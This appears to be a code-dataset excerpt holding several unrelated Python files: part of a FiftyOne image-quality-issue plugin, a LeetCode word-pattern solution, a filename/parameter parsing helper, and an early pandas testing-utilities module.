compute_dataset_property(issue_name, dataset, patches_field=patches_field)\n\n\n######## ISSUE FUNCTIONS ########\n\nISSUE_MAPPING = {\n \"bright\": {\n \"label\": \"Bright\",\n \"base_property\": \"brightness\",\n \"threshold\": 0.55,\n \"lt\": False,\n \"description\": \"Find bright images in the dataset\",\n },\n \"dark\": {\n \"label\": \"Dark\",\n \"base_property\": \"brightness\",\n \"threshold\": 0.1,\n \"lt\": True,\n \"description\": \"Find dark images in the dataset\",\n },\n \"weird_aspect_ratio\": {\n \"label\": \"Weird Aspect Ratio\",\n \"base_property\": \"aspect_ratio\",\n \"threshold\": 0.5,\n \"lt\": True,\n \"description\": \"Find weird aspect ratio images in the dataset\",\n },\n \"blurry\": {\n \"label\": \"Blurry\",\n \"base_property\": \"blurriness\",\n \"threshold\": 100.0,\n \"lt\": True,\n \"description\": \"Find blurry images in the dataset\",\n },\n \"low_entropy\": {\n \"label\": \"Low Entropy\",\n \"base_property\": \"entropy\",\n \"threshold\": 
5.0,\n \"lt\": True,\n \"description\": \"Find low entropy images in the dataset\",\n },\n \"low_exposure\": {\n \"label\": \"Low Exposure\",\n \"base_property\": \"min_exposure\",\n \"threshold\": 0.1,\n \"lt\": True,\n \"description\": \"Find low exposure images in the dataset\",\n },\n \"high_exposure\": {\n \"label\": \"High Exposure\",\n \"base_property\": \"max_exposure\",\n \"threshold\": 0.7,\n \"lt\": False,\n \"description\": \"Find high exposure images in the dataset\",\n },\n \"low_contrast\": {\n \"label\": \"Low Contrast\",\n \"base_property\": \"contrast\",\n \"threshold\": 50.0,\n \"lt\": True,\n \"description\": \"Find low contrast images in the dataset\",\n },\n \"high_contrast\": {\n \"label\": \"High Contrast\",\n \"base_property\": \"contrast\",\n \"threshold\": 200.0,\n \"lt\": False,\n \"description\": \"Find high contrast images in the dataset\",\n },\n \"low_saturation\": {\n \"label\": \"Low Saturation\",\n \"base_property\": \"saturation\",\n \"threshold\": 40.0,\n \"lt\": True,\n \"description\": \"Find low saturation images in the dataset\",\n },\n \"high_saturation\": {\n \"label\": \"High Saturation\",\n \"base_property\": \"saturation\",\n \"threshold\": 200.0,\n \"lt\": False,\n \"description\": \"Find high saturation images in the dataset\",\n },\n}\n\n\ndef find_issue_images(\n dataset,\n threshold,\n field_name,\n issue_name,\n lt=True,\n patches_field=None,\n view=None,\n):\n if _need_to_compute(dataset, field_name, patches_field=patches_field):\n _run_computation(dataset, field_name, patches_field=patches_field)\n\n if view is None:\n view = dataset\n\n if patches_field is None:\n dataset.add_sample_field(issue_name, fo.BooleanField)\n\n if lt:\n view = view.set_field(issue_name, F(field_name) < threshold)\n else:\n view = view.set_field(issue_name, F(field_name) > threshold)\n view.save()\n view = view.match(F(issue_name))\n view.tag_samples(issue_name)\n view.tag_samples(\"issue\")\n view.save()\n else:\n embedded_field_name = f\"{patches_field}.detections.{field_name}\"\n embedded_issue_name = f\"{patches_field}.detections.{issue_name}\"\n if lt:\n values = view.values(F(embedded_field_name) < threshold)\n else:\n values = view.values(F(embedded_field_name) > threshold)\n view.set_values(embedded_issue_name, values, dynamic=True)\n view = view.filter_labels(patches_field, filter=F(issue_name) == True)\n view.tag_labels(issue_name, label_fields=patches_field)\n view.tag_labels(\"issue\", label_fields=patches_field)\n dataset.add_dynamic_sample_fields()\n\n\ndef _find_issue_type_images(\n dataset, issue_type, threshold=None, patches_field=None, view=None\n):\n issue = ISSUE_MAPPING[issue_type]\n if threshold is None:\n threshold = issue[\"threshold\"]\n find_issue_images(\n dataset,\n threshold,\n issue[\"base_property\"],\n issue_type,\n lt=issue[\"lt\"],\n patches_field=patches_field,\n view=view,\n )\n\n\ndef _single_or_multi_mode(inputs):\n mode = types.RadioGroup()\n mode.add_choice(\n \"SINGLE\",\n label=\"SINGLE\",\n description=\"Find a single type of issue\",\n )\n mode.add_choice(\n \"MULTI\",\n label=\"MULTI\",\n description=\"Find multiple types of issues\",\n )\n inputs.enum(\n \"issue_mode\",\n mode.values(),\n default=\"SINGLE\",\n description=\"Find a single type of issue or multiple types of issues\",\n view=types.TabsView(),\n )\n\n\nclass FindIssues(foo.Operator):\n @property\n def config(self):\n _config = foo.OperatorConfig(\n name=\"find_issues\",\n label=\"Common Issues: find issues\",\n dynamic=True,\n )\n _config.icon = 
\"/assets/icon.svg\"\n return _config\n\n def resolve_input(self, ctx):\n inputs = types.Object()\n form_view = types.View(label=\"Find Common Issues\")\n if ctx.dataset.media_type != \"image\":\n warning = types.Warning(\n label=\"This operator is only available for image datasets!\"\n )\n inputs.view(\"warning\", warning)\n return types.Property(inputs)\n\n threshold_view = types.TextFieldView(\n componentsProps={\n \"textField\": {\n \"step\": \"0.01\",\n \"inputMode\": \"numeric\",\n \"pattern\": \"[0-9]*\",\n },\n }\n )\n\n _single_or_multi_mode(inputs)\n\n mode = ctx.params.get(\"issue_mode\", \"SINGLE\")\n _list_target_views(ctx, inputs)\n _handle_patch_inputs(ctx, inputs)\n\n if mode == \"SINGLE\":\n issue_choices = types.Dropdown(multiple=False)\n for issue in ISSUE_MAPPING:\n issue_choices.add_choice(\n issue,\n label=ISSUE_MAPPING[issue][\"label\"],\n description=ISSUE_MAPPING[issue][\"description\"],\n )\n inputs.enum(\n \"issue\",\n issue_choices.values(),\n required=True,\n label=\"Issue Type\",\n view=issue_choices,\n )\n\n for issue in ISSUE_MAPPING:\n if ctx.params.get(\"issue\", False) == issue:\n inputs.float(\n issue + \"_threshold\",\n default=ISSUE_MAPPING[issue][\"threshold\"],\n label=ISSUE_MAPPING[issue][\"description\"],\n view=threshold_view,\n )\n else:\n for issue in ISSUE_MAPPING:\n inputs.bool(\n issue,\n default=True,\n label=ISSUE_MAPPING[issue][\"label\"],\n view=types.CheckboxView(),\n )\n\n if ctx.params.get(issue, False) == True:\n inputs.float(\n issue + \"_threshold\",\n default=ISSUE_MAPPING[issue][\"threshold\"],\n label=ISSUE_MAPPING[issue][\"description\"],\n view=threshold_view,\n )\n\n return types.Property(inputs, view=form_view)\n\n def execute(self, ctx):\n single_mode = ctx.params.get(\"issue_mode\", \"SINGLE\")\n view = _get_target_view(ctx, ctx.params[\"target\"])\n patches_field = ctx.params.get(\"patches_field\", None)\n\n for issue in ISSUE_MAPPING.keys():\n if (\n ctx.params.get(issue, False) == True\n and single_mode == \"MULTI\"\n or ctx.params.get(\"issue\", False) == issue\n and single_mode == \"SINGLE\"\n ):\n threshold_key = ISSUE_MAPPING[issue][\"threshold\"]\n threshold = ctx.params.get(threshold_key, None)\n _find_issue_type_images(\n ctx.dataset,\n issue,\n threshold=threshold,\n patches_field=patches_field,\n view=view,\n )\n\n ctx.trigger(\"reload_dataset\")\n\n\ndef register(plugin):\n plugin.register(ComputeAspectRatio)\n plugin.register(ComputeBlurriness)\n plugin.register(ComputeBrightness)\n plugin.register(ComputeContrast)\n plugin.register(ComputeEntropy)\n plugin.register(ComputeExposure)\n plugin.register(ComputeSaltAndPepper)\n plugin.register(ComputeSaturation)\n plugin.register(ComputeVignetting)\n plugin.register(FindIssues)\n","repo_name":"jacobmarks/image-quality-issues","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":31516,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"3"}
+{"seq_id":"9716229458","text":"class Solution:\n def wordPattern(self, p: str, s: str) -> bool:\n words= s.split(' ')\n mp={}\n if len(p)!=len(words):return False\n if len(set(p)) != len(set(words)): return False # for the case w = ['dog', 'cat'] and p = 'aa'\n\n for i in range(len(words)):\n if words[i] not in mp: \n mp[words[i]] = p[i]\n elif mp[words[i]] != p[i]: \n return False\n\n return True","repo_name":"janvi2002/Leetcode","sub_path":"0290-word-pattern/0290-word-pattern.py","file_name":"0290-word-pattern.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"25938220656","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 3 15:06:16 2020\n\n@author: henric\n\"\"\"\n\ndef dict_to_str(params, key_sep='-', value_sep=':'):\n if len(params)==0:\n return ''\n return key_sep.join(sorted(['{}{}{}'.format(k,value_sep, v) for k,v in params.items()]))\n\ndef str_to_dict(params_str, key_sep='-', value_sep=':'):\n if not params_str:\n return {}\n splitted = params_str.split('-')\n splitted = [dict_formatting(s, value_sep) for s in splitted]\n return eval('{{{}}}'.format(','.join(splitted)))\n\ndef dict_formatting(s, value_sep=':'):\n k,v = s.split(value_sep)\n try:\n eval(v)\n except:\n v = '\"{}\"'.format(v)\n return value_sep.join(['\"{}\"'.format(k), v])\n\ndef give_filename(filename_rad, prefix='', params={}, extension='ply', sep='_'):\n filename = sep.join(filter(None, [prefix, filename_rad, dict_to_str(params)]))\n return '{}.{}'.format(filename, extension)\n\ndef parse_filename(filename, sep='_', key_sep='-', value_sep=':'):\n filename = '.'.join(filename.split('.')[:-1])\n parts = filename.split(sep)\n \n prefix, filename_rad, params_str = '', '', ''\n \n if len(parts)==1:\n filename_rad = parts[0]\n elif len(parts)==3:\n prefix, filename_rad, params_str = parts\n elif len(parts)==2:\n if value_sep in parts[-1]:\n params_str = parts[-1]\n filename_rad = parts[0]\n else:\n prefix, filename_rad = parts\n else:\n raise ValueError('wrong format')\n \n params = str_to_dict(params_str, key_sep, value_sep)\n return prefix, filename_rad, params\n \n \n ","repo_name":"VincentHenric/IASD_3D","sub_path":"project/code/fileutils.py","file_name":"fileutils.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"19238692342","text":"from __future__ import division\n\n# pylint: disable-msg=W0402\n\nfrom datetime import datetime\nimport random\nimport string\nimport sys\nimport tempfile\n\nfrom contextlib import contextmanager # contextlib is available since 2.5\n\nfrom distutils.version import LooseVersion\n\nfrom numpy.random import randn\nimport numpy as np\n\nfrom pandas.core.common import isnull, _is_sequence\nimport pandas.core.index as index\nimport pandas.core.series as series\nimport pandas.core.frame as frame\nimport pandas.core.panel as panel\nimport pandas.core.panel4d as panel4d\n\nfrom pandas import bdate_range\nfrom pandas.tseries.index import DatetimeIndex\nfrom pandas.tseries.period import PeriodIndex\n\nIndex = index.Index\nMultiIndex = index.MultiIndex\nSeries = series.Series\nDataFrame = frame.DataFrame\nPanel = panel.Panel\nPanel4D = panel4d.Panel4D\n\nN = 30\nK = 4\n\n\ndef rands(n):\n choices = string.ascii_letters + string.digits\n return ''.join([random.choice(choices) for _ in xrange(n)])\n\n\ndef randu(n):\n choices = u\"\".join(map(unichr, range(1488, 1488 + 26))) + string.digits\n return ''.join([random.choice(choices) for _ in xrange(n)])\n\n#------------------------------------------------------------------------------\n# Console debugging tools\n\n\ndef debug(f, *args, **kwargs):\n from pdb import Pdb as OldPdb\n try:\n from IPython.core.debugger import Pdb\n kw = dict(color_scheme='Linux')\n except ImportError:\n Pdb = OldPdb\n kw = {}\n pdb = Pdb(**kw)\n return pdb.runcall(f, *args, **kwargs)\n\n\ndef pudebug(f, *args, **kwargs):\n import pudb\n return pudb.runcall(f, *args, **kwargs)\n\n\ndef set_trace():\n from IPython.core.debugger import Pdb\n try:\n Pdb(color_scheme='Linux').set_trace(sys._getframe().f_back)\n except:\n from pdb import Pdb as OldPdb\n OldPdb().set_trace(sys._getframe().f_back)\n\n#------------------------------------------------------------------------------\n# contextmanager to ensure the file cleanup\nfrom contextlib import contextmanager\n@contextmanager\ndef ensure_clean(filename = None):\n # if we are not passed a filename, generate a temporary\n if filename is None:\n filename = tempfile.mkstemp()[1]\n\n try:\n yield filename\n finally:\n import os\n try:\n os.remove(filename)\n except:\n pass\n\ndef get_data_path(f = None):\n \"\"\" return the path of a data file, these are relative to the current test dir \"\"\"\n\n if f is None:\n f = ''\n import inspect, os\n\n # get our callers file\n frame,filename,line_number,function_name,lines,index = \\\n inspect.getouterframes(inspect.currentframe())[1]\n\n base_dir = os.path.abspath(os.path.dirname(filename))\n return os.path.join(base_dir, 'data/%s' % f)\n\n#------------------------------------------------------------------------------\n# Comparators\n\n\ndef equalContents(arr1, arr2):\n \"\"\"Checks if the set of unique elements of arr1 and arr2 are equivalent.\n \"\"\"\n return frozenset(arr1) == frozenset(arr2)\n\n\ndef isiterable(obj):\n return hasattr(obj, '__iter__')\n\n\ndef assert_almost_equal(a, b, check_less_precise = False):\n if isinstance(a, dict) or isinstance(b, dict):\n return assert_dict_equal(a, b)\n\n if isinstance(a, basestring):\n assert a == b, (a, b)\n return True\n\n if isiterable(a):\n np.testing.assert_(isiterable(b))\n assert(len(a) == len(b))\n if np.array_equal(a, b):\n return True\n else:\n for i in xrange(len(a)):\n assert_almost_equal(a[i], b[i], check_less_precise)\n return True\n\n err_msg = lambda a, b: 'expected %.5f but got %.5f' % (a, b)\n\n 
if isnull(a):\n np.testing.assert_(isnull(b))\n return\n\n if isinstance(a, (bool, float, int, np.float32)):\n decimal = 5\n\n # deal with differing dtypes\n if check_less_precise:\n dtype_a = np.dtype(type(a))\n dtype_b = np.dtype(type(b))\n if dtype_a.kind == 'i' and dtype_b == 'i':\n pass\n if dtype_a.kind == 'f' and dtype_b == 'f':\n if dtype_a.itemsize <= 4 and dtype_b.itemsize <= 4:\n decimal = 3\n\n if np.isinf(a):\n assert np.isinf(b), err_msg(a, b)\n\n # case for zero\n elif abs(a) < 1e-5:\n np.testing.assert_almost_equal(\n a, b, decimal=decimal, err_msg=err_msg(a, b), verbose=False)\n else:\n np.testing.assert_almost_equal(\n 1, a / b, decimal=decimal, err_msg=err_msg(a, b), verbose=False)\n else:\n assert(a == b)\n\n\ndef is_sorted(seq):\n return assert_almost_equal(seq, np.sort(np.array(seq)))\n\n\ndef assert_dict_equal(a, b, compare_keys=True):\n a_keys = frozenset(a.keys())\n b_keys = frozenset(b.keys())\n\n if compare_keys:\n assert(a_keys == b_keys)\n\n for k in a_keys:\n assert_almost_equal(a[k], b[k])\n\n\ndef assert_series_equal(left, right, check_dtype=True,\n check_index_type=False,\n check_index_freq=False,\n check_series_type=False,\n check_less_precise=False):\n if check_series_type:\n assert(type(left) == type(right))\n assert_almost_equal(left.values, right.values, check_less_precise)\n if check_dtype:\n assert(left.dtype == right.dtype)\n if check_less_precise:\n assert_almost_equal(left.index.values, right.index.values, check_less_precise)\n else:\n assert(left.index.equals(right.index))\n if check_index_type:\n assert(type(left.index) == type(right.index))\n assert(left.index.dtype == right.index.dtype)\n assert(left.index.inferred_type == right.index.inferred_type)\n if check_index_freq:\n assert(getattr(left, 'freqstr', None) ==\n getattr(right, 'freqstr', None))\n\n\ndef assert_frame_equal(left, right, check_dtype=True,\n check_index_type=False,\n check_column_type=False,\n check_frame_type=False,\n check_less_precise=False,\n check_names=True):\n if check_frame_type:\n assert(type(left) == type(right))\n assert(isinstance(left, DataFrame))\n assert(isinstance(right, DataFrame))\n\n if check_less_precise:\n assert_almost_equal(left.columns,right.columns)\n assert_almost_equal(left.index,right.index)\n else:\n assert(left.columns.equals(right.columns))\n assert(left.index.equals(right.index))\n\n for i, col in enumerate(left.columns):\n assert(col in right)\n lcol = left.icol(i)\n rcol = right.icol(i)\n assert_series_equal(lcol, rcol,\n check_dtype=check_dtype,\n check_index_type=check_index_type,\n check_less_precise=check_less_precise)\n\n if check_index_type:\n assert(type(left.index) == type(right.index))\n assert(left.index.dtype == right.index.dtype)\n assert(left.index.inferred_type == right.index.inferred_type)\n if check_column_type:\n assert(type(left.columns) == type(right.columns))\n assert(left.columns.dtype == right.columns.dtype)\n assert(left.columns.inferred_type == right.columns.inferred_type)\n if check_names:\n assert(left.index.names == right.index.names)\n assert(left.columns.names == right.columns.names)\n\n\ndef assert_panel_equal(left, right,\n check_panel_type=False,\n check_less_precise=False):\n if check_panel_type:\n assert(type(left) == type(right))\n\n assert(left.items.equals(right.items))\n assert(left.major_axis.equals(right.major_axis))\n assert(left.minor_axis.equals(right.minor_axis))\n\n for col, series in left.iterkv():\n assert(col in right)\n assert_frame_equal(series, right[col], 
check_less_precise=check_less_precise, check_names=False) # TODO strangely check_names fails in py3 ?\n\n for col in right:\n assert(col in left)\n\n\ndef assert_panel4d_equal(left, right,\n check_less_precise=False):\n assert(left.labels.equals(right.labels))\n assert(left.items.equals(right.items))\n assert(left.major_axis.equals(right.major_axis))\n assert(left.minor_axis.equals(right.minor_axis))\n\n for col, series in left.iterkv():\n assert(col in right)\n assert_panel_equal(series, right[col], check_less_precise=check_less_precise)\n\n for col in right:\n assert(col in left)\n\n\ndef assert_contains_all(iterable, dic):\n for k in iterable:\n assert(k in dic)\n\n\ndef getCols(k):\n return string.ascii_uppercase[:k]\n\n\ndef makeStringIndex(k):\n return Index([rands(10) for _ in xrange(k)])\n\n\ndef makeUnicodeIndex(k):\n return Index([randu(10) for _ in xrange(k)])\n\n\ndef makeIntIndex(k):\n return Index(range(k))\n\n\ndef makeFloatIndex(k):\n values = sorted(np.random.random_sample(k)) - np.random.random_sample(1)\n return Index(values * (10 ** np.random.randint(0, 9)))\n\n\ndef makeFloatSeries():\n index = makeStringIndex(N)\n return Series(randn(N), index=index)\n\n\ndef makeStringSeries():\n index = makeStringIndex(N)\n return Series(randn(N), index=index)\n\n\ndef makeObjectSeries():\n dateIndex = makeDateIndex(N)\n dateIndex = Index(dateIndex, dtype=object)\n index = makeStringIndex(N)\n return Series(dateIndex, index=index)\n\n\ndef getSeriesData():\n index = makeStringIndex(N)\n return dict((c, Series(randn(N), index=index)) for c in getCols(K))\n\n\ndef makeDataFrame():\n data = getSeriesData()\n return DataFrame(data)\n\n\ndef getArangeMat():\n return np.arange(N * K).reshape((N, K))\n\n\ndef getMixedTypeDict():\n index = Index(['a', 'b', 'c', 'd', 'e'])\n\n data = {\n 'A': [0., 1., 2., 3., 4.],\n 'B': [0., 1., 0., 1., 0.],\n 'C': ['foo1', 'foo2', 'foo3', 'foo4', 'foo5'],\n 'D': bdate_range('1/1/2009', periods=5)\n }\n\n return index, data\n\n\ndef makeDateIndex(k):\n dt = datetime(2000, 1, 1)\n dr = bdate_range(dt, periods=k)\n return DatetimeIndex(dr)\n\n\ndef makePeriodIndex(k):\n dt = datetime(2000, 1, 1)\n dr = PeriodIndex(start=dt, periods=k, freq='B')\n return dr\n\n\ndef makeTimeSeries(nper=None):\n if nper is None:\n nper = N\n return Series(randn(nper), index=makeDateIndex(nper))\n\n\ndef makePeriodSeries(nper=None):\n if nper is None:\n nper = N\n return Series(randn(nper), index=makePeriodIndex(nper))\n\n\ndef getTimeSeriesData(nper=None):\n return dict((c, makeTimeSeries(nper)) for c in getCols(K))\n\n\ndef makeTimeDataFrame(nper=None):\n data = getTimeSeriesData(nper)\n return DataFrame(data)\n\n\ndef getPeriodData():\n return dict((c, makePeriodSeries()) for c in getCols(K))\n\n\ndef makePeriodFrame():\n data = getPeriodData()\n return DataFrame(data)\n\n\ndef makePanel(nper=None):\n cols = ['Item' + c for c in string.ascii_uppercase[:K - 1]]\n data = dict((c, makeTimeDataFrame(nper)) for c in cols)\n return Panel.fromDict(data)\n\n\ndef makePanel4D(nper=None):\n return Panel4D(dict(l1=makePanel(nper), l2=makePanel(nper),\n l3=makePanel(nper)))\n\n\ndef makeCustomIndex(nentries, nlevels, prefix='#', names=False, ndupe_l=None,\n idx_type=None):\n \"\"\"Create an index/multindex with given dimensions, levels, names, etc'\n\n nentries - number of entries in index\n nlevels - number of levels (> 1 produces multindex)\n prefix - a string prefix for labels\n names - (Optional), bool or list of strings. 
if True will use default names,\n if false will use no names, if a list is given, the name of each level\n in the index will be taken from the list.\n ndupe_l - (Optional), list of ints, the number of rows for which the\n label will repeated at the corresponding level, you can specify just\n the first few, the rest will use the default ndupe_l of 1.\n len(ndupe_l) <= nlevels.\n idx_type - \"i\"/\"f\"/\"s\"/\"u\"/\"dt/\"p\".\n If idx_type is not None, `idx_nlevels` must be 1.\n \"i\"/\"f\" creates an integer/float index,\n \"s\"/\"u\" creates a string/unicode index\n \"dt\" create a datetime index.\n\n if unspecified, string labels will be generated.\n \"\"\"\n\n from pandas.util.compat import Counter\n if ndupe_l is None:\n ndupe_l = [1] * nlevels\n assert (_is_sequence(ndupe_l) and len(ndupe_l) <= nlevels)\n assert (names is None or names is False\n or names is True or len(names) is nlevels)\n assert idx_type is None or \\\n (idx_type in ('i', 'f', 's', 'u', 'dt', 'p') and nlevels == 1)\n\n if names is True:\n # build default names\n names = [prefix + str(i) for i in range(nlevels)]\n if names is False:\n # pass None to index constructor for no name\n names = None\n\n # make singelton case uniform\n if isinstance(names, basestring) and nlevels == 1:\n names = [names]\n\n # specific 1D index type requested?\n idx_func = dict(i=makeIntIndex, f=makeFloatIndex, s=makeStringIndex,\n u=makeUnicodeIndex, dt=makeDateIndex, p=makePeriodIndex).get(idx_type)\n if idx_func:\n idx = idx_func(nentries)\n # but we need to fill in the name\n if names:\n idx.name = names[0]\n return idx\n elif idx_type is not None:\n raise ValueError('\"%s\" is not a legal value for `idx_type`, use '\n '\"i\"/\"f\"/\"s\"/\"u\"/\"dt/\"p\".' % idx_type)\n\n if len(ndupe_l) < nlevels:\n ndupe_l.extend([1] * (nlevels - len(ndupe_l)))\n assert len(ndupe_l) == nlevels\n\n assert all([x > 0 for x in ndupe_l])\n\n tuples = []\n for i in range(nlevels):\n def keyfunc(x):\n import re\n numeric_tuple = re.sub(\"[^\\d_]_?\",\"\",x).split(\"_\")\n return map(int,numeric_tuple)\n\n # build a list of lists to create the index from\n div_factor = nentries // ndupe_l[i] + 1\n cnt = Counter()\n for j in range(div_factor):\n label = prefix + '_l%d_g' % i + str(j)\n cnt[label] = ndupe_l[i]\n # cute Counter trick\n result = list(sorted(cnt.elements(), key=keyfunc))[:nentries]\n tuples.append(result)\n\n tuples = zip(*tuples)\n\n # convert tuples to index\n if nentries == 1:\n index = Index(tuples[0], name=names[0])\n else:\n index = MultiIndex.from_tuples(tuples, names=names)\n return index\n\n\ndef makeCustomDataframe(nrows, ncols, c_idx_names=True, r_idx_names=True,\n c_idx_nlevels=1, r_idx_nlevels=1, data_gen_f=None,\n c_ndupe_l=None, r_ndupe_l=None, dtype=None,\n c_idx_type=None, r_idx_type=None):\n \"\"\"\n nrows, ncols - number of data rows/cols\n c_idx_names, idx_names - False/True/list of strings, yields No names ,\n default names or uses the provided names for the levels of the\n corresponding index. You can provide a single string when\n c_idx_nlevels ==1.\n c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex\n r_idx_nlevels - number of levels in rows index. 
> 1 will yield MultiIndex\n data_gen_f - a function f(row,col) which return the data value at that position,\n the default generator used yields values of the form \"RxCy\" based on position.\n c_ndupe_l, r_ndupe_l - list of integers, determines the number\n of duplicates for each label at a given level of the corresponding index.\n The default `None` value produces a multiplicity of 1 across\n all levels, i.e. a unique index. Will accept a partial list of\n length N < idx_nlevels, for just the first N levels. If ndupe\n doesn't divide nrows/ncol, the last label might have lower multiplicity.\n dtype - passed to the DataFrame constructor as is, in case you wish to\n have more control in conjuncion with a custom `data_gen_f`\n r_idx_type, c_idx_type - \"i\"/\"f\"/\"s\"/\"u\"/\"dt\".\n If idx_type is not None, `idx_nlevels` must be 1.\n \"i\"/\"f\" creates an integer/float index,\n \"s\"/\"u\" creates a string/unicode index\n \"dt\" create a datetime index.\n\n if unspecified, string labels will be generated.\n\n Examples:\n\n # 5 row, 3 columns, default names on both, single index on both axis\n >> makeCustomDataframe(5,3)\n\n # make the data a random int between 1 and 100\n >> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))\n\n # 2-level multiindex on rows with each label duplicated twice on first level,\n # default names on both axis, single index on both axis\n >> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])\n\n # DatetimeIndex on row, index with unicode labels on columns\n # no names on either axis\n >> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,\n r_idx_type=\"dt\",c_idx_type=\"u\")\n\n # 4-level multindex on rows with names provided, 2-level multindex\n # on columns with default labels and default names.\n >> a=makeCustomDataframe(5,3,r_idx_nlevels=4,\n r_idx_names=[\"FEE\",\"FI\",\"FO\",\"FAM\"],\n c_idx_nlevels=2)\n\n >> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)\n \"\"\"\n\n assert c_idx_nlevels > 0\n assert r_idx_nlevels > 0\n assert r_idx_type is None or \\\n (r_idx_type in ('i', 'f', 's', 'u', 'dt', 'p') and r_idx_nlevels == 1)\n assert c_idx_type is None or \\\n (c_idx_type in ('i', 'f', 's', 'u', 'dt', 'p') and c_idx_nlevels == 1)\n\n columns = makeCustomIndex(ncols, nlevels=c_idx_nlevels, prefix='C',\n names=c_idx_names, ndupe_l=c_ndupe_l,\n idx_type=c_idx_type)\n index = makeCustomIndex(nrows, nlevels=r_idx_nlevels, prefix='R',\n names=r_idx_names, ndupe_l=r_ndupe_l,\n idx_type=r_idx_type)\n\n # by default, generate data based on location\n if data_gen_f is None:\n data_gen_f = lambda r, c: \"R%dC%d\" % (r, c)\n\n data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]\n\n return DataFrame(data, index, columns, dtype=dtype)\n\n\ndef add_nans(panel):\n I, J, N = panel.shape\n for i, item in enumerate(panel.items):\n dm = panel[item]\n for j, col in enumerate(dm.columns):\n dm[col][:i + j] = np.NaN\n\n\ndef add_nans_panel4d(panel4d):\n for l, label in enumerate(panel4d.labels):\n panel = panel4d[label]\n add_nans(panel)\n\n\nclass TestSubDict(dict):\n def __init__(self, *args, **kwargs):\n dict.__init__(self, *args, **kwargs)\n\n\n# Dependency checks. 
Copied this from Nipy/Nipype (Copyright of\n# respective developers, license: BSD-3)\ndef package_check(pkg_name, version=None, app='pandas', checker=LooseVersion,\n exc_failed_import=ImportError,\n exc_failed_check=RuntimeError):\n \"\"\"Check that the minimal version of the required package is installed.\n\n Parameters\n ----------\n pkg_name : string\n Name of the required package.\n version : string, optional\n Minimal version number for required package.\n app : string, optional\n Application that is performing the check. For instance, the\n name of the tutorial being executed that depends on specific\n packages.\n checker : object, optional\n The class that will perform the version checking. Default is\n distutils.version.LooseVersion.\n exc_failed_import : Exception, optional\n Class of the exception to be thrown if import failed.\n exc_failed_check : Exception, optional\n Class of the exception to be thrown if version check failed.\n\n Examples\n --------\n package_check('numpy', '1.3')\n package_check('networkx', '1.0', 'tutorial1')\n\n \"\"\"\n\n if app:\n msg = '%s requires %s' % (app, pkg_name)\n else:\n msg = 'module requires %s' % pkg_name\n if version:\n msg += ' with version >= %s' % (version,)\n try:\n mod = __import__(pkg_name)\n except ImportError:\n raise exc_failed_import(msg)\n if not version:\n return\n try:\n have_version = mod.__version__\n except AttributeError:\n raise exc_failed_check('Cannot find version for %s' % pkg_name)\n if checker(have_version) < checker(version):\n raise exc_failed_check(msg)\n\n\ndef skip_if_no_package(*args, **kwargs):\n \"\"\"Raise SkipTest if package_check fails\n\n Parameters\n ----------\n *args Positional parameters passed to `package_check`\n *kwargs Keyword parameters passed to `package_check`\n \"\"\"\n from nose import SkipTest\n package_check(exc_failed_import=SkipTest,\n exc_failed_check=SkipTest,\n *args, **kwargs)\n\n#\n# Additional tags decorators for nose\n#\n\n\ndef network(t):\n \"\"\"\n Label a test as requiring network connection.\n\n In some cases it is not possible to assume network presence (e.g. 
Debian\n build hosts).\n\n Parameters\n ----------\n t : callable\n The test requiring network connectivity.\n\n Returns\n -------\n t : callable\n The decorated test `t`.\n\n Examples\n --------\n A test can be decorated as requiring network like this::\n\n from pandas.util.testing import *\n\n @network\n def test_network(self):\n print 'Fetch the stars from http://'\n\n And use ``nosetests -a '!network'`` to exclude running tests requiring\n network connectivity.\n \"\"\"\n\n t.network = True\n return t\n\n\nclass SimpleMock(object):\n \"\"\"\n Poor man's mocking object\n\n Note: only works for new-style classes, assumes __getattribute__ exists.\n\n >>> a = type(\"Duck\",(),{})\n >>> a.attr1,a.attr2 =\"fizz\",\"buzz\"\n >>> b = SimpleMock(a,\"attr1\",\"bar\")\n >>> b.attr1 == \"bar\" and b.attr2 == \"buzz\"\n True\n >>> a.attr1 == \"fizz\" and a.attr2 == \"buzz\"\n True\n \"\"\"\n def __init__(self, obj, *args, **kwds):\n assert(len(args) % 2 == 0)\n attrs = kwds.get(\"attrs\", {})\n for k, v in zip(args[::2], args[1::2]):\n # dict comprehensions break 2.6\n attrs[k] = v\n self.attrs = attrs\n self.obj = obj\n\n def __getattribute__(self, name):\n attrs = object.__getattribute__(self, \"attrs\")\n obj = object.__getattribute__(self, \"obj\")\n return attrs.get(name, type(obj).__getattribute__(obj, name))\n\n\n@contextmanager\ndef stdin_encoding(encoding=None):\n \"\"\"\n Context manager for running bits of code while emulating an arbitrary\n stdin encoding.\n\n >>> import sys\n >>> _encoding = sys.stdin.encoding\n >>> with stdin_encoding('AES'): sys.stdin.encoding\n 'AES'\n >>> sys.stdin.encoding==_encoding\n True\n\n \"\"\"\n import sys\n _stdin = sys.stdin\n sys.stdin = SimpleMock(sys.stdin, \"encoding\", encoding)\n yield\n sys.stdin = _stdin\n","repo_name":"miniBloq/v0.83","sub_path":"source/Bin/Minibloq/lang/PPythonWin/v2.7.5.1/App/Lib/site-packages/pandas/util/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":22877,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"3"}
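# --- Illustrative sketch (added; not part of the original record). ---
# The vendored comparators above live on in modern pandas as the public
# pandas.testing module; a quick tolerance-aware frame comparison through
# that API (assumes a current pandas install):
import pandas as pd
import pandas.testing as tm

left = pd.DataFrame({'a': [1.0, 2.0]})
right = pd.DataFrame({'a': [1.0, 2.0 + 1e-9]})
tm.assert_frame_equal(left, right, check_exact=False)  # passes: within default rtol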
